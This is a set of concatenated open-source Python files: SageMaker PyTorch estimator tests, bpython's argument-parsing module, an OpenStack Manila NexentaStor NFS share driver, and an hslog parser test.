def test_mms_model(repack_model, sagemaker_session):
PyTorchModel(
MODEL_DATA,
role=ROLE,
entry_point=SCRIPT_PATH,
sagemaker_session=sagemaker_session,
framework_version="1.2",
).deploy(1, GPU)
repack_model.assert_called_with(
dependencies=[],
inference_script=SCRIPT_PATH,
kms_key=None,
model_uri="s3://some/data.tar.gz",
repacked_model_uri=ANY,
sagemaker_session=sagemaker_session,
source_directory=None,
)
@patch("sagemaker.utils.create_tar_file", MagicMock())
@patch("sagemaker.utils.repack_model")
def test_non_mms_model(repack_model, sagemaker_session):
PyTorchModel(
MODEL_DATA,
role=ROLE,
entry_point=SCRIPT_PATH,
sagemaker_session=sagemaker_session,
framework_version="1.1",
).deploy(1, GPU)
repack_model.assert_not_called()
@patch("sagemaker.fw_utils.tar_and_upload_dir", MagicMock())
def test_model_image_accelerator(sagemaker_session):
with pytest.raises(ValueError) as error:
model = PyTorchModel(
MODEL_DATA,
role=ROLE,
entry_point=SCRIPT_PATH,
sagemaker_session=sagemaker_session,
framework_version="1.3.1",
py_version="py2",
)
model.deploy(1, CPU, accelerator_type=ACCELERATOR_TYPE)
assert "pytorch-serving is not supported with Amazon Elastic Inference in Python 2." in str(
error
)
def test_train_image_default(sagemaker_session):
pytorch = PyTorch(
entry_point=SCRIPT_PATH,
role=ROLE,
sagemaker_session=sagemaker_session,
train_instance_count=INSTANCE_COUNT,
train_instance_type=INSTANCE_TYPE,
)
assert (
_get_full_cpu_image_uri(defaults.PYTORCH_VERSION, defaults.PYTHON_VERSION)
in pytorch.train_image()
)
def test_train_image_cpu_instances(sagemaker_session, pytorch_version):
pytorch = _pytorch_estimator(
sagemaker_session, pytorch_version, train_instance_type="ml.c2.2xlarge"
)
assert pytorch.train_image() == _get_full_cpu_image_uri(pytorch_version)
pytorch = _pytorch_estimator(
sagemaker_session, pytorch_version, train_instance_type="ml.c4.2xlarge"
)
assert pytorch.train_image() == _get_full_cpu_image_uri(pytorch_version)
pytorch = _pytorch_estimator(sagemaker_session, pytorch_version, train_instance_type="ml.m16")
assert pytorch.train_image() == _get_full_cpu_image_uri(pytorch_version)
def test_train_image_gpu_instances(sagemaker_session, pytorch_version):
pytorch = _pytorch_estimator(
sagemaker_session, pytorch_version, train_instance_type="ml.g2.2xlarge"
)
assert pytorch.train_image() == _get_full_gpu_image_uri(pytorch_version)
pytorch = _pytorch_estimator(
sagemaker_session, pytorch_version, train_instance_type="ml.p2.2xlarge"
)
assert pytorch.train_image() == _get_full_gpu_image_uri(pytorch_version)
def test_attach(sagemaker_session, pytorch_version):
training_image = "1.dkr.ecr.us-west-2.amazonaws.com/sagemaker-pytorch:{}-cpu-{}".format(
pytorch_version, PYTHON_VERSION
)
returned_job_description = {
"AlgorithmSpecification": {"TrainingInputMode": "File", "TrainingImage": training_image},
"HyperParameters": {
"sagemaker_submit_directory": '"s3://some/sourcedir.tar.gz"',
"sagemaker_program": '"iris-dnn-classifier.py"',
"sagemaker_s3_uri_training": '"sagemaker-3/integ-test-data/tf_iris"',
"sagemaker_enable_cloudwatch_metrics": "false",
"sagemaker_container_log_level": '"logging.INFO"',
"sagemaker_job_name": '"neo"',
"training_steps": "100",
"sagemaker_region": '"us-west-2"',
},
"RoleArn": "arn:aws:iam::366:role/SageMakerRole",
"ResourceConfig": {
"VolumeSizeInGB": 30,
"InstanceCount": 1,
"InstanceType": "ml.c4.xlarge",
},
"StoppingCondition": {"MaxRuntimeInSeconds": 24 * 60 * 60},
"TrainingJobName": "neo",
"TrainingJobStatus": "Completed",
"TrainingJobArn": "arn:aws:sagemaker:us-west-2:336:training-job/neo",
"OutputDataConfig": {"KmsKeyId": "", "S3OutputPath": "s3://place/output/neo"},
"TrainingJobOutput": {"S3TrainingJobOutput": "s3://here/output.tar.gz"},
}
sagemaker_session.sagemaker_client.describe_training_job = Mock(
name="describe_training_job", return_value=returned_job_description
)
estimator = PyTorch.attach(training_job_name="neo", sagemaker_session=sagemaker_session)
assert estimator.latest_training_job.job_name == "neo"
assert estimator.py_version == PYTHON_VERSION
assert estimator.framework_version == pytorch_version
assert estimator.role == "arn:aws:iam::366:role/SageMakerRole"
assert estimator.train_instance_count == 1
assert estimator.train_max_run == 24 * 60 * 60
assert estimator.input_mode == "File"
assert estimator.base_job_name == "neo"
assert estimator.output_path == "s3://place/output/neo"
assert estimator.output_kms_key == ""
assert estimator.hyperparameters()["training_steps"] == "100"
assert estimator.source_dir == "s3://some/sourcedir.tar.gz"
assert estimator.entry_point == "iris-dnn-classifier.py"
def test_attach_wrong_framework(sagemaker_session):
rjd = {
"AlgorithmSpecification": {
"TrainingInputMode": "File",
"TrainingImage": "1.dkr.ecr.us-west-2.amazonaws.com/sagemaker-mxnet-py2-cpu:1.0.4",
},
"HyperParameters": {
"sagemaker_submit_directory": '"s3://some/sourcedir.tar.gz"',
"checkpoint_path": '"s3://other/1508872349"',
"sagemaker_program": '"iris-dnn-classifier.py"',
"sagemaker_enable_cloudwatch_metrics": "false",
"sagemaker_container_log_level": '"logging.INFO"',
"training_steps": "100",
"sagemaker_region": '"us-west-2"',
},
"RoleArn": "arn:aws:iam::366:role/SageMakerRole",
"ResourceConfig": {
"VolumeSizeInGB": 30,
"InstanceCount": 1,
"InstanceType": "ml.c4.xlarge",
},
"StoppingCondition": {"MaxRuntimeInSeconds": 24 * 60 * 60},
"TrainingJobName": "neo",
"TrainingJobStatus": "Completed",
"TrainingJobArn": "arn:aws:sagemaker:us-west-2:336:training-job/neo",
"OutputDataConfig": {"KmsKeyId": "", "S3OutputPath": "s3://place/output/neo"},
"TrainingJobOutput": {"S3TrainingJobOutput": "s3://here/output.tar.gz"},
}
sagemaker_session.sagemaker_client.describe_training_job = Mock(
name="describe_training_job", return_value=rjd
)
with pytest.raises(ValueError) as error:
PyTorch.attach(training_job_name="neo", sagemaker_session=sagemaker_session)
assert "didn't use image for requested framework" in str(error)
def test_attach_custom_image(sagemaker_session):
training_image = "pytorch:latest"
returned_job_description = {
"AlgorithmSpecification": {"TrainingInputMode": "File", "TrainingImage": training_image},
"HyperParameters": {
"sagemaker_submit_directory": '"s3://some/sourcedir.tar.gz"',
"sagemaker_program": '"iris-dnn-classifier.py"',
"sagemaker_s3_uri_training": '"sagemaker-3/integ-test-data/tf_iris"',
"sagemaker_enable_cloudwatch_metrics": "false",
"sagemaker_container_log_level": '"logging.INFO"',
"sagemaker_job_name": '"neo"',
"training_steps": "100",
"sagemaker_region": '"us-west-2"',
},
"RoleArn": "arn:aws:iam::366:role/SageMakerRole",
"ResourceConfig": {
"VolumeSizeInGB": 30,
"InstanceCount": 1,
"InstanceType": "ml.c4.xlarge",
},
"StoppingCondition": {"MaxRuntimeInSeconds": 24 * 60 * 60},
"TrainingJobName": "neo",
"TrainingJobStatus": "Completed",
"TrainingJobArn": "arn:aws:sagemaker:us-west-2:336:training-job/neo",
"OutputDataConfig": {"KmsKeyId": "", "S3OutputPath": "s3://place/output/neo"},
"TrainingJobOutput": {"S3TrainingJobOutput": "s3://here/output.tar.gz"},
}
sagemaker_session.sagemaker_client.describe_training_job = Mock(
name="describe_training_job", return_value=returned_job_description
)
estimator = PyTorch.attach(training_job_name="neo", sagemaker_session=sagemaker_session)
assert estimator.latest_training_job.job_name == "neo"
assert estimator.image_name == training_image
assert estimator.train_image() == training_image
@patch("sagemaker.pytorch.estimator.python_deprecation_warning")
def test_estimator_py2_warning(warning, sagemaker_session):
estimator = PyTorch(
entry_point=SCRIPT_PATH,
role=ROLE,
sagemaker_session=sagemaker_session,
train_instance_count=INSTANCE_COUNT,
train_instance_type=INSTANCE_TYPE,
py_version="py2",
)
assert estimator.py_version == "py2"
warning.assert_called_with(estimator.__framework_name__, defaults.LATEST_PY2_VERSION)
@patch("sagemaker.pytorch.model.python_deprecation_warning")
def test_model_py2_warning(warning, sagemaker_session):
model = PyTorchModel(
MODEL_DATA,
role=ROLE,
entry_point=SCRIPT_PATH,
sagemaker_session=sagemaker_session,
py_version="py2",
)
assert model.py_version == "py2"
warning.assert_called_with(model.__framework_name__, defaults.LATEST_PY2_VERSION)
@patch("sagemaker.pytorch.estimator.empty_framework_version_warning")
def test_empty_framework_version(warning, sagemaker_session):
estimator = PyTorch(
entry_point=SCRIPT_PATH,
role=ROLE,
sagemaker_session=sagemaker_session,
train_instance_count=INSTANCE_COUNT,
train_instance_type=INSTANCE_TYPE,
framework_version=None,
)
assert estimator.framework_version == defaults.PYTORCH_VERSION
warning.assert_called_with(defaults.PYTORCH_VERSION, estimator.LATEST_VERSION)
@patch("sagemaker.pytorch.model.empty_framework_version_warning")
def test_model_empty_framework_version(warning, sagemaker_session):
model = PyTorchModel(
MODEL_DATA,
role=ROLE,
entry_point=SCRIPT_PATH,
sagemaker_session=sagemaker_session,
framework_version=None,
)
assert model.framework_version == defaults.PYTORCH_VERSION
warning.assert_called_with(defaults.PYTORCH_VERSION, defaults.LATEST_VERSION)
def test_pt_enable_sm_metrics(sagemaker_session):
pytorch = _pytorch_estimator(sagemaker_session, enable_sagemaker_metrics=True)
assert pytorch.enable_sagemaker_metrics
def test_pt_disable_sm_metrics(sagemaker_session):
pytorch = _pytorch_estimator(sagemaker_session, enable_sagemaker_metrics=False)
assert not pytorch.enable_sagemaker_metrics
def test_pt_disable_sm_metrics_if_pt_ver_is_less_than_1_3(sagemaker_session):
for fw_version in ["1.1", "1.2"]:
pytorch = _pytorch_estimator(sagemaker_session, framework_version=fw_version)
assert pytorch.enable_sagemaker_metrics is None
def test_pt_enable_sm_metrics_if_fw_ver_is_at_least_1_3(sagemaker_session):
for fw_version in ["1.3", "1.4", "2.0", "2.1"]:
pytorch = _pytorch_estimator(sagemaker_session, framework_version=fw_version)
assert pytorch.enable_sagemaker_metrics
def test_custom_image_estimator_deploy(sagemaker_session):
custom_image = "mycustomimage:latest"
pytorch = _pytorch_estimator(sagemaker_session)
pytorch.fit(inputs="s3://mybucket/train", job_name="new_name")
model = pytorch.create_model(image=custom_image)
assert model.image == custom_image
|
the-stack_106_19086
|
# The MIT License
#
# Copyright (c) 2008 Bob Farrell
# Copyright (c) 2012-2021 Sebastian Ramacher
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# To gradually migrate to mypy we aren't setting these globally yet
# mypy: disallow_untyped_defs=True
# mypy: disallow_untyped_calls=True
"""
Module to handle command line argument parsing, for all front-ends.
"""
import argparse
from typing import Tuple, List, Optional, NoReturn, Callable
import code
import curtsies
import cwcwidth
import greenlet
import importlib.util
import logging
import os
import pygments
import requests
import sys
from pathlib import Path
from . import __version__, __copyright__
from .config import default_config_path, Config
from .translations import _
logger = logging.getLogger(__name__)
class ArgumentParserFailed(ValueError):
"""Raised by the RaisingOptionParser for a bogus commandline."""
class RaisingArgumentParser(argparse.ArgumentParser):
def error(self, msg: str) -> NoReturn:
raise ArgumentParserFailed()
def version_banner(base: str = "bpython") -> str:
return _("{} version {} on top of Python {} {}").format(
base,
__version__,
sys.version.split()[0],
sys.executable,
)
def copyright_banner() -> str:
return _("{} See AUTHORS.rst for details.").format(__copyright__)
Options = Tuple[str, str, Callable[[argparse._ArgumentGroup], None]]
def parse(
args: Optional[List[str]],
extras: Optional[Options] = None,
ignore_stdin: bool = False,
) -> Tuple[Config, argparse.Namespace, List[str]]:
"""Receive an argument list - if None, use sys.argv - parse all args and
take appropriate action. Also receive optional extra argument: this should
be a tuple of (title, description, callback)
title: The title for the argument group
description: A full description of the argument group
callback: A callback that adds argument to the argument group
e.g.:
def callback(group):
group.add_argument('-f', action='store_true', dest='f', help='Explode')
group.add_argument('-l', action='store_true', dest='l', help='Love')
parse(
['-i', '-m', 'foo.py'],
(
'Front end-specific options',
'A full description of what these options are for',
callback
),
)
Return a tuple of (config, options, exec_args) wherein "config" is the
config object either parsed from a default/specified config file or default
config options, "options" is the parsed options from
ArgumentParser.parse_args, and "exec_args" are the args (if any) to be parsed
to the executed file (if any).
"""
if args is None:
args = sys.argv[1:]
parser = RaisingArgumentParser(
usage=_(
"Usage: %(prog)s [options] [file [args]]\n"
"NOTE: If bpython sees an argument it does "
"not know, execution falls back to the "
"regular Python interpreter."
)
)
parser.add_argument(
"--config",
default=default_config_path(),
type=Path,
help=_("Use CONFIG instead of default config file."),
)
parser.add_argument(
"--interactive",
"-i",
action="store_true",
help=_("Drop to bpython shell after running file instead of exiting."),
)
parser.add_argument(
"--quiet",
"-q",
action="store_true",
help=_("Don't flush the output to stdout."),
)
parser.add_argument(
"--version",
"-V",
action="store_true",
help=_("Print version and exit."),
)
parser.add_argument(
"--log-level",
"-l",
choices=("debug", "info", "warning", "error", "critical"),
default="error",
help=_("Set log level for logging"),
)
parser.add_argument(
"--log-output",
"-L",
help=_("Log output file"),
)
if extras is not None:
extras_group = parser.add_argument_group(extras[0], extras[1])
extras[2](extras_group)
# collect all the remaining arguments into a list
parser.add_argument(
"args",
nargs=argparse.REMAINDER,
help=_(
"File to execute and additional arguments passed on to the executed script."
),
)
try:
options = parser.parse_args(args)
except ArgumentParserFailed:
# Just let Python handle this
os.execv(sys.executable, [sys.executable] + args)
if options.version:
print(version_banner())
print(copyright_banner())
raise SystemExit
if not ignore_stdin and not (sys.stdin.isatty() and sys.stdout.isatty()):
# Just let Python handle this
os.execv(sys.executable, [sys.executable] + args)
# Configure logging handler
bpython_logger = logging.getLogger("bpython")
curtsies_logger = logging.getLogger("curtsies")
bpython_logger.setLevel(options.log_level.upper())
curtsies_logger.setLevel(options.log_level.upper())
if options.log_output:
handler = logging.FileHandler(filename=options.log_output)
handler.setFormatter(
logging.Formatter(
"%(asctime)s: %(name)s: %(levelname)s: %(message)s"
)
)
bpython_logger.addHandler(handler)
curtsies_logger.addHandler(handler)
bpython_logger.propagate = curtsies_logger.propagate = False
else:
bpython_logger.addHandler(logging.NullHandler())
curtsies_logger.addHandler(logging.NullHandler())
logger.info(f"Starting bpython {__version__}")
logger.info(f"Python {sys.executable}: {sys.version_info}")
logger.info(f"curtsies: {curtsies.__version__}")
logger.info(f"cwcwidth: {cwcwidth.__version__}")
logger.info(f"greenlet: {greenlet.__version__}")
logger.info(f"pygments: {pygments.__version__}") # type: ignore
logger.info(f"requests: {requests.__version__}")
logger.info(
"environment:\n{}".format(
"\n".join(
f"{key}: {value}"
for key, value in sorted(os.environ.items())
if key.startswith("LC")
or key.startswith("LANG")
or key == "TERM"
)
)
)
return Config(options.config), options, options.args
def exec_code(
interpreter: code.InteractiveInterpreter, args: List[str]
) -> None:
"""
Helper to execute code in a given interpreter, e.g. to implement the behavior of python3 [-i] file.py
args should be a [faked] sys.argv.
"""
try:
with open(args[0]) as sourcefile:
source = sourcefile.read()
except OSError as e:
# print an error and exit (if -i is specified the calling code will continue)
print(f"bpython: can't open file '{args[0]}: {e}", file=sys.stderr)
raise SystemExit(e.errno)
old_argv, sys.argv = sys.argv, args
sys.path.insert(0, os.path.abspath(os.path.dirname(args[0])))
spec = importlib.util.spec_from_loader("__console__", loader=None)
assert spec
mod = importlib.util.module_from_spec(spec)
sys.modules["__console__"] = mod
interpreter.locals.update(mod.__dict__) # type: ignore # TODO use a more specific type that has a .locals attribute
interpreter.locals["__file__"] = args[0] # type: ignore # TODO use a more specific type that has a .locals attribute
interpreter.runsource(source, args[0], "exec")
sys.argv = old_argv
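# ---------------------------------------------------------------------------
# Illustrative sketch only (not part of the original module): how a minimal
# front-end might combine parse() and exec_code() above. The "--paste" flag,
# the group title, and the whole _example_front_end helper are hypothetical;
# the real front-ends live elsewhere in the bpython package.
def _example_front_end() -> None:
    def _callback(group: argparse._ArgumentGroup) -> None:
        # Hypothetical front-end specific flag.
        group.add_argument("--paste", action="store_true", help="Paste mode")

    config, options, exec_args = parse(
        None,
        ("Example front end options", "Options for this sketch only", _callback),
    )
    # config would normally be handed to the UI layer; unused in this sketch.
    del config
    interpreter = code.InteractiveInterpreter()
    if exec_args:
        # Run the requested file, then optionally fall back to a shell.
        exec_code(interpreter, exec_args)
        if not options.interactive:
            raise SystemExit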
|
the-stack_106_19087
|
# Copyright 2016 Nexenta Systems, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log
from oslo_utils import units
from manila.common import constants as common
from manila import exception
from manila.i18n import _, _LW, _LE
from manila.share import driver
from manila.share.drivers.nexenta.ns5 import jsonrpc
from manila.share.drivers.nexenta import options
from manila.share.drivers.nexenta import utils
PATH_DELIMITER = '%2F'
VERSION = '1.0'
LOG = log.getLogger(__name__)
class NexentaNasDriver(driver.ShareDriver):
"""Nexenta Share Driver.
Executes commands relating to Shares.
API version history:
1.0 - Initial version.
"""
driver_prefix = 'nexenta'
def __init__(self, *args, **kwargs):
"""Do initialization."""
LOG.debug('Initializing Nexenta driver.')
super(NexentaNasDriver, self).__init__(False, *args, **kwargs)
self.configuration = kwargs.get('configuration')
if self.configuration:
self.configuration.append_config_values(
options.nexenta_connection_opts)
self.configuration.append_config_values(
options.nexenta_nfs_opts)
self.configuration.append_config_values(
options.nexenta_dataset_opts)
else:
raise exception.BadConfigurationException(
reason=_('Nexenta configuration missing.'))
self.nef = None
self.nef_protocol = self.configuration.nexenta_rest_protocol
self.nef_host = self.configuration.nexenta_host
self.nef_port = self.configuration.nexenta_rest_port
self.nef_user = self.configuration.nexenta_user
self.nef_password = self.configuration.nexenta_password
self.pool_name = self.configuration.nexenta_pool
self.fs_prefix = self.configuration.nexenta_nfs_share
self.storage_protocol = 'NFS'
self.nfs_mount_point_base = self.configuration.nexenta_mount_point_base
self.dataset_compression = (
self.configuration.nexenta_dataset_compression)
self.provisioned_capacity = 0
@property
def share_backend_name(self):
if not hasattr(self, '_share_backend_name'):
self._share_backend_name = None
if self.configuration:
self._share_backend_name = self.configuration.safe_get(
'share_backend_name')
if not self._share_backend_name:
self._share_backend_name = 'NexentaStor5'
return self._share_backend_name
def do_setup(self, context):
"""Any initialization the nexenta nas driver does while starting."""
if self.nef_protocol == 'auto':
protocol = 'https'
else:
protocol = self.nef_protocol
self.nef = jsonrpc.NexentaJSONProxy(
protocol, self.nef_host, self.nef_port, self.nef_user,
self.nef_password)
def check_for_setup_error(self):
"""Verify that the volume for our folder exists.
:raise: :py:exc:`LookupError`
"""
url = 'storage/pools/{}'.format(self.pool_name)
if not self.nef.get(url):
raise LookupError(
_("Pool {} does not exist in Nexenta Store appliance").format(
self.pool_name))
url = 'storage/pools/{}/filesystems/{}'.format(self.pool_name,
self.fs_prefix)
if not self.nef.get(url):
raise LookupError(
_("filesystem {} does not exist in Nexenta Store "
"appliance").format(self.fs_prefix))
path = '/'.join((self.pool_name, self.fs_prefix))
shared = False
response = self.nef.get('nas/nfs')
for share in response['data']:
if share.get('filesystem') == path:
shared = True
break
if not shared:
raise LookupError(_(
"Dataset {} is not shared in Nexenta Store appliance").format(
path))
self._get_provisioned_capacity()
def _get_provisioned_capacity(self):
path = '%(pool)s/%(fs)s' % {
'pool': self.pool_name, 'fs': self.fs_prefix}
url = 'storage/filesystems?parent=%s' % path
fs_list = self.nef.get(url)['data']
for fs in fs_list:
if fs['path'] != path:
self.provisioned_capacity += fs['quotaSize'] / units.Gi
def create_share(self, context, share, share_server=None):
"""Create a share."""
LOG.debug('Creating share: %s.', share['name'])
data = {
'recordSize': 4 * units.Ki,
'compressionMode': self.dataset_compression,
'name': '/'.join((self.fs_prefix, share['name'])),
'quotaSize': share['size'] * units.Gi,
}
if not self.configuration.nexenta_thin_provisioning:
data['reservationSize'] = share['size'] * units.Gi
url = 'storage/pools/{}/filesystems'.format(self.pool_name)
self.nef.post(url, data)
location = {
'path': '{}:/{}/{}/{}'.format(self.nef_host, self.pool_name,
self.fs_prefix, share['name'])
}
try:
self._add_permission(share['name'])
except exception.NexentaException:
try:
self.delete_share(None, share)
except exception.NexentaException as exc:
LOG.warning(_LW(
"Cannot destroy created filesystem: %(vol)s/%(folder)s, "
"exception: %(exc)s"),
{'vol': self.pool_name, 'folder': '/'.join(
(self.fs_prefix, share['name'])), 'exc': exc})
raise
self.provisioned_capacity += share['size']
return [location]
def create_share_from_snapshot(self, context, share, snapshot,
share_server=None):
"""Is called to create share from snapshot."""
LOG.debug('Creating share from snapshot %s.', snapshot['name'])
url = ('storage/pools/%(pool)s/'
'filesystems/%(fs)s/snapshots/%(snap)s/clone') % {
'pool': self.pool_name,
'fs': PATH_DELIMITER.join(
(self.fs_prefix, snapshot['share_name'])),
'snap': snapshot['name']}
location = {
'path': '{}:/{}/{}/{}'.format(self.nef_host, self.pool_name,
self.fs_prefix, share['name'])
}
path = '/'.join((self.pool_name, self.fs_prefix, share['name']))
data = {
'targetPath': path,
'quotaSize': share['size'] * units.Gi,
'recordSize': 4 * units.Ki,
'compressionMode': self.dataset_compression,
}
if not self.configuration.nexenta_thin_provisioning:
data['reservationSize'] = share['size'] * units.Gi
self.nef.post(url, data)
try:
self._add_permission(share['name'])
except exception.NexentaException:
LOG.exception(
_LE('Failed to add permissions for %s'), share['name'])
try:
self.delete_share(None, share)
except exception.NexentaException:
LOG.warning(_LW("Cannot destroy cloned filesystem: "
"%(vol)s/%(filesystem)s"),
{'vol': self.pool_name,
'filesystem': '/'.join(
(self.fs_prefix, share['name']))})
raise
self.provisioned_capacity += share['size']
return [location]
def delete_share(self, context, share, share_server=None):
"""Delete a share."""
LOG.debug('Deleting share: %s.', share['name'])
url = 'storage/pools/%(pool)s/filesystems/%(fs)s' % {
'pool': self.pool_name,
'fs': PATH_DELIMITER.join([self.fs_prefix, share['name']]),
}
self.nef.delete(url)
self.provisioned_capacity -= share['size']
def extend_share(self, share, new_size, share_server=None):
"""Extends a share."""
LOG.debug(
'Extending share: %(name)s to %(size)sG.', (
{'name': share['name'], 'size': new_size}))
self._set_quota(share['name'], new_size)
self.provisioned_capacity += (new_size - share['size'])
def shrink_share(self, share, new_size, share_server=None):
"""Shrinks size of existing share."""
LOG.debug(
'Shrinking share: %(name)s to %(size)sG.', {
'name': share['name'], 'size': new_size})
url = 'storage/pools/{}/filesystems/{}%2F{}'.format(self.pool_name,
self.fs_prefix,
share['name'])
used = self.nef.get(url)['bytesUsed'] / units.Gi
if used > new_size:
raise exception.ShareShrinkingPossibleDataLoss(
share_id=share['id'])
self._set_quota(share['name'], new_size)
self.provisioned_capacity += (share['size'] - new_size)
def create_snapshot(self, context, snapshot, share_server=None):
"""Create a snapshot."""
LOG.debug('Creating a snapshot of share: %s.', snapshot['share_name'])
url = 'storage/pools/%(pool)s/filesystems/%(fs)s/snapshots' % {
'pool': self.pool_name,
'fs': PATH_DELIMITER.join(
(self.fs_prefix, snapshot['share_name'])),
}
data = {'name': snapshot['name']}
self.nef.post(url, data)
def delete_snapshot(self, context, snapshot, share_server=None):
"""Delete a snapshot."""
LOG.debug('Deleting a snapshot: %(shr_name)s@%(snap_name)s.', {
'shr_name': snapshot['share_name'],
'snap_name': snapshot['name']})
url = ('storage/pools/%(pool)s/filesystems/%(fs)s/snapshots/'
'%(snap)s') % {'pool': self.pool_name,
'fs': PATH_DELIMITER.join(
(self.fs_prefix, snapshot['share_name'])),
'snap': snapshot['name']}
try:
self.nef.delete(url)
except exception.NexentaException as e:
if e.kwargs['code'] == 'ENOENT':
LOG.warning(
_LW('snapshot %(name)s not found, response: %(msg)s'), {
'name': snapshot['name'], 'msg': e.msg})
else:
raise
def update_access(self, context, share, access_rules, add_rules,
delete_rules, share_server=None):
"""Update access rules for given share.
Using access_rules list for both adding and deleting rules.
:param context: The `context.RequestContext` object for the request
:param share: Share that will have its access rules updated.
:param access_rules: All access rules for given share. This list
is enough to update the access rules for given share.
:param add_rules: Empty List or List of access rules which should be
added. access_rules already contains these rules. Not used by this
driver.
:param delete_rules: Empty List or List of access rules which should be
removed. access_rules doesn't contain these rules. Not used by
this driver.
:param share_server: Data structure with share server information.
Not used by this driver.
"""
LOG.debug('Updating access to share %s.', share)
rw_list = []
ro_list = []
security_contexts = []
for rule in access_rules:
if rule['access_type'].lower() != 'ip':
msg = _('Only IP access type is supported.')
raise exception.InvalidShareAccess(reason=msg)
else:
if rule['access_level'] == common.ACCESS_LEVEL_RW:
rw_list.append(rule['access_to'])
else:
ro_list.append(rule['access_to'])
def append_sc(addr_list, sc_type):
for addr in addr_list:
address_mask = addr.strip().split('/', 1)
address = address_mask[0]
ls = [{"allow": True, "etype": "network", "entity": address}]
if len(address_mask) == 2:
try:
mask = int(address_mask[1])
if mask != 32:
ls[0]['mask'] = mask
except Exception:
raise exception.InvalidInput(
reason=_(
'<{}> is not a valid access parameter').format(
addr))
new_sc = {"securityModes": ["sys"]}
new_sc[sc_type] = ls
security_contexts.append(new_sc)
append_sc(rw_list, 'readWriteList')
append_sc(ro_list, 'readOnlyList')
data = {"securityContexts": security_contexts}
url = 'nas/nfs/' + PATH_DELIMITER.join(
(self.pool_name, self.fs_prefix, share['name']))
self.nef.put(url, data)
def _set_quota(self, share_name, new_size):
quota = new_size * units.Gi
data = {'quotaSize': quota}
if not self.configuration.nexenta_thin_provisioning:
data['reservationSize'] = quota
url = 'storage/pools/{}/filesystems/{}%2F{}'.format(self.pool_name,
self.fs_prefix,
share_name)
self.nef.put(url, data)
def _update_share_stats(self, data=None):
super(NexentaNasDriver, self)._update_share_stats()
total, free, allocated = self._get_capacity_info()
data = {
'vendor_name': 'Nexenta',
'storage_protocol': self.storage_protocol,
'share_backend_name': self.share_backend_name,
'nfs_mount_point_base': self.nfs_mount_point_base,
'driver_version': VERSION,
'pools': [{
'pool_name': self.pool_name,
'total_capacity_gb': total,
'free_capacity_gb': free,
'reserved_percentage': (
self.configuration.reserved_share_percentage),
'max_over_subscription_ratio': (
self.configuration.safe_get(
'max_over_subscription_ratio')),
'thin_provisioning':
self.configuration.nexenta_thin_provisioning,
'provisioned_capacity_gb': self.provisioned_capacity,
}],
}
self._stats.update(data)
def _get_capacity_info(self):
"""Calculate available space on the NFS share."""
url = 'storage/pools/{}/filesystems/{}'.format(self.pool_name,
self.fs_prefix)
data = self.nef.get(url)
total = utils.bytes_to_gb(data['bytesAvailable'])
allocated = utils.bytes_to_gb(data['bytesUsed'])
free = total - allocated
return total, free, allocated
def _add_permission(self, share_name):
"""Share NFS filesystem on NexentaStor Appliance.
:param share_name: relative filesystem name to be shared
"""
LOG.debug(
'Creating RW ACE for filesystem everyone on Nexenta Store '
'for <%s> filesystem.', share_name)
url = 'storage/pools/{}/filesystems/{}/acl'.format(
self.pool_name, PATH_DELIMITER.join((self.fs_prefix, share_name)))
data = {
"type": "allow",
"principal": "everyone@",
"permissions": [
"list_directory",
"read_data",
"add_file",
"write_data",
"add_subdirectory",
"append_data",
"read_xattr",
"write_xattr",
"execute",
"delete_child",
"read_attributes",
"write_attributes",
"delete",
"read_acl",
"write_acl",
"write_owner",
"synchronize",
],
"flags": [
"file_inherit",
"dir_inherit",
],
}
self.nef.post(url, data)
LOG.debug(
'RW ACE for filesystem <%s> on Nexenta Store has been '
'successfully created.', share_name)
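# ---------------------------------------------------------------------------
# Illustrative sketch only (not part of the original driver): the NEF payload
# that update_access() above builds for a single read-write network rule. The
# addresses are hypothetical.
#
#   access_rules = [{'access_type': 'ip',
#                    'access_to': '10.0.0.0/24',
#                    'access_level': common.ACCESS_LEVEL_RW}]
#
# produces the PUT body:
#
#   {"securityContexts": [
#       {"securityModes": ["sys"],
#        "readWriteList": [
#            {"allow": True, "etype": "network",
#             "entity": "10.0.0.0", "mask": 24}]}]}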
|
the-stack_106_19091
|
from datetime import datetime, time, timedelta
from io import StringIO
from unittest.mock import patch
import pytest
from aniso8601 import parse_datetime, parse_time
from hearthstone.enums import (
CardType, ChoiceType, GameTag, OptionType,
PlayReq, PlayState, PowerType, State, Step, Zone
)
from hslog import LogParser, packets
from hslog.exceptions import ParsingError
from hslog.parser import parse_initial_tag
from . import data
def test_create_empty_game():
parser = LogParser()
parser.read(StringIO(data.EMPTY_GAME))
parser.flush()
# Test resulting game/entities
assert len(parser.games) == 1
packet_tree = parser.games[0]
game = packet_tree.export().game
assert len(game._entities) == 3
assert len(game.players) == 2
assert game._entities[1] is game
assert game._entities[1].id == 1
assert game._entities[2] is game.players[0]
assert game._entities[3] is game.players[1]
assert game.initial_state == State.INVALID
assert game.initial_step == Step.INVALID
# Test player objects
assert game.players[0].id == 2
assert game.players[0].player_id == 1
assert game.players[0].account_hi == 1
assert game.players[0].account_lo == 0
assert game.players[0].is_ai
assert not game.players[0].name
assert game.players[1].id == 3
assert game.players[1].player_id == 2
assert game.players[1].account_hi == 3
assert game.players[1].account_lo == 2
